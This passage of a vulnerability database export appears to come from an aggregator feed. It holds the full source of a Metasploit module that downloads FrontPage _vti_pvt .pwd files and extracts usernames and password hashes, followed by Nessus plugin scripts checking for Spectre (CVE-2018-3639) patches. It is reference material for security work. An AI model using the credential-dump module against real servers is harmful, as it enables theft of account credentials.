"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_crop_rce.rb"}, {"lastseen": "2019-12-09T09:09:16", "bulletinFamily": "exploit", "description": "This module downloads and parses the '_vti_pvt/service.pwd', '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage server to find credentials.\n", "modified": "2018-09-21T16:44:10", "published": "2018-08-27T18:20:26", "id": "MSF:AUXILIARY/SCANNER/HTTP/FRONTPAGE_CREDENTIAL_DUMP", "href": "", "type": "metasploit", "title": "FrontPage .pwd File Credential Dump", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'FrontPage .pwd File Credential Dump',\n 'Description' => %q{\n This module downloads and parses the '_vti_pvt/service.pwd',\n '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage\n server to find credentials.\n },\n 'References' =>\n [\n [ 'PACKETSTORM', '11556'],\n [ 'URL', 'https://insecure.org/sploits/Microsoft.frontpage.insecurities.html'],\n [ 'URL', 'http://sparty.secniche.org/' ]\n ],\n 'Author' =>\n [\n 'Aditya K Sood @adityaksood', # Sparty tool'\n 'Stephen Haywood @averagesecguy' # Metasploit module'\n ],\n 'License' => MSF_LICENSE,\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path', '/'])\n ])\n end\n\n\n def get_pass_file(fname)\n uri = normalize_uri(target_uri.path, '_vti_pvt', fname)\n\n vprint_status(\"Requesting: #{uri}\")\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => 'GET',\n })\n\n unless res.code == 200\n vprint_status(\"File #{uri} not found.\")\n return nil\n end\n\n vprint_status(\"Found #{uri}.\")\n\n unless res.body.lines.first.chomp == '# -FrontPage-'\n vprint_status(\"File does not contain FrontPage credentials.\")\n vprint_status(res.body)\n return nil\n end\n\n vprint_status(\"Found FrontPage credentials.\")\n return res.body\n end\n\n def run_host(ip)\n files = ['service.pwd', 'administrators.pwd', 'authors.pwd']\n creds = []\n\n files.each do |filename|\n source = filename.chomp('.pwd').capitalize\n contents = get_pass_file(filename)\n\n next if contents.nil?\n\n print_good(\"#{ip} - #{filename}\")\n\n contents.each_line do |line|\n next if line.chomp == '# -FrontPage-'\n user = line.chomp.split(':')[0]\n pass = line.chomp.split(':')[1]\n\n creds << [source, user, pass]\n end\n end\n\n cred_table = Rex::Text::Table.new(\n 'Header' => 'FrontPage Credentials',\n 'Indent' => 1,\n 'Columns' => ['Source', 'Username', 'Password Hash']\n )\n\n creds.each do |c|\n cred_table << c\n end\n\n print_line\n print_line(\"#{cred_table}\")\n\n loot_name = 'frontpage.creds'\n loot_type = 'text/csv'\n loot_filename = 'frontpage_creds.csv'\n loot_desc = 'FrontPage Credentials'\n\n p = store_loot(\n loot_name,\n loot_type,\n rhost,\n cred_table.to_csv,\n loot_filename,\n loot_desc)\n\n print_status \"Credentials saved in: #{p}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/frontpage_credential_dump.rb"}], "nessus": [{"lastseen": "2019-11-01T02:32:11", "bulletinFamily": "scanner", "description": "The v4.16.11 kernel includes important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2018-DB0D3E157E.NASL", "href": "https://www.tenable.com/plugins/nessus/120842", "published": "2019-01-03T00:00:00", "title": "Fedora 28 : kernel (2018-db0d3e157e) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-db0d3e157e.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120842);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/23 11:21:09\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"FEDORA\", value:\"2018-db0d3e157e\");\n\n script_name(english:\"Fedora 28 : kernel (2018-db0d3e157e) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The v4.16.11 kernel includes important fixes across the tree\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-db0d3e157e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-3639\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2018-db0d3e157e\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"kernel-4.16.11-300.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-01T02:30:39", "bulletinFamily": "scanner", "description": "Add new CPU features for speculative store bypass (CVE-2018-3639)\n\nOn Intel x86 hosts, the ", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2018-527698A904.NASL", "href": "https://www.tenable.com/plugins/nessus/120426", "published": "2019-01-03T00:00:00", "title": "Fedora 28 : libvirt (2018-527698a904) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-527698a904.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120426);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/23 11:21:06\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"FEDORA\", value:\"2018-527698a904\");\n\n script_name(english:\"Fedora 28 : libvirt (2018-527698a904) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add new CPU features for speculative store bypass (CVE-2018-3639)\n\nOn Intel x86 hosts, the 'ssbd' feature must be explicitly added to any\nvirtual machines that are not using host-passthrough/host-model CPU\nsetup. NB this requires new microcode too, which is not yet available\nin Fedora microcode_ctl RPMs.\n\nOn AMD x86 hosts, the 'virt-ssbd' feature must be explicitly added to\nany virtual machines that are not using host-passthrough/host-model\nCPU setup. There is no microcode dependency for AMD as this is a\nvirtualized CPUID feature.\n\nIn both cases, kernel >= 4.16.10-301 is required on the host and guest\nin order to activate the fix.\n\nQEMU >= qemu-2.11.1-3.fc28 is also required on the host\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-527698a904\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvirt package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"libvirt-4.1.0-3.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvirt\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-01T03:25:27", "bulletinFamily": "scanner", "description": "An update for qemu-kvm is now available for Red Hat Enterprise Linux\n7.2 Advanced Update Support, Red Hat Enterprise Linux 7.2 Telco\nExtended Update Support, and Red Hat Enterprise Linux 7.2 Update\nServices for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2018-3423.NASL", "href": "https://www.tenable.com/plugins/nessus/118558", "published": "2018-10-31T00:00:00", "title": "RHEL 7 : qemu-kvm (RHSA-2018:3423) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3423. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118558);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:3423\");\n\n script_name(english:\"RHEL 7 : qemu-kvm (RHSA-2018:3423) (Spectre)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for qemu-kvm is now available for Red Hat Enterprise Linux\n7.2 Advanced Update Support, Red Hat Enterprise Linux 7.2 Telco\nExtended Update Support, and Red Hat Enterprise Linux 7.2 Update\nServices for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/ssbd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3639\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libcacard\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libcacard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libcacard-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-img\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7\\.2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.2\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3423\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"i686\", reference:\"libcacard-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"libcacard-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"i686\", reference:\"libcacard-devel-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"libcacard-devel-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"libcacard-tools-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-img-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-kvm-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-kvm-common-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"i686\", reference:\"qemu-kvm-debuginfo-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-kvm-debuginfo-1.5.3-105.el7_2.18\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-kvm-tools-1.5.3-105.el7_2.18\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libcacard / libcacard-devel / libcacard-tools / qemu-img / qemu-kvm / etc\");\n }\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-01T03:25:16", "bulletinFamily": "scanner", "description": "An update for qemu-kvm is now available for Red Hat Enterprise Linux\n6.4 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2018-3401.NASL", "href": "https://www.tenable.com/plugins/nessus/118550", "published": "2018-10-31T00:00:00", "title": "RHEL 6 : qemu-kvm (RHSA-2018:3401) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3401. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118550);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:3401\");\n\n script_name(english:\"RHEL 6 : qemu-kvm (RHSA-2018:3401) (Spectre)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for qemu-kvm is now available for Red Hat Enterprise Linux\n6.4 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/ssbd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3639\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-guest-agent-win32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-img\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n 